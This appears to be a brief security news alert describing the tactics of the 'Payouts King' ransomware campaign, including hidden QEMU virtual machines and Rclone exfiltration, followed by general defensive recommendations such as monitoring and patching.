New Ransomware Threat "Payouts King" Evades Detection Through VM Exploitation

Post Views: 5

RANSOMWARE THREAT ALERT: “PAYOUTS KING” HIDES INSIDE VIRTUAL MACHINES TO DODGE DETECTION

Cybersecurity researchers have identified a highly sophisticated ransomware threat known as “Payouts King,” which utilizes hidden virtual machines (VMs) to evade detection by modern endpoint security solutions.

Tactics and Techniques:

Initial Access: Compromised systems often involve exploiting exposed VPN systems, such as SonicWall and Cisco SSL VPN, as well as vulnerabilities in software like SolarWinds Web Help Desk.
Social Engineering: Attackers impersonate IT support personnel and contact employees via Microsoft Teams to install malware.
Hidden Virtual Machines: Payouts King uses open-source virtualization tool QEMU to deploy hidden VMs within compromised systems.
Data Exfiltration: Thieves steal data using Rclone and encrypt it with AES-256 and RSA-4096, making recovery difficult without decryption keys.
Encryption Speedup: Intermittent encryption for large files speeds up the attack.

According to cybersecurity experts, “The Payouts King ransomware campaign represents a major challenge for traditional defense systems, requiring organizations to adopt multi-layered security strategies and implement proactive measures to protect against such advanced cyber threats.”

Experts recommend monitoring for unauthorized QEMU installations, suspicious scheduled tasks running with SYSTEM privileges, unusual SSH tunneling, and abnormal network traffic. Regularly updating patches and providing employee awareness training can help prevent successful ransomware attacks.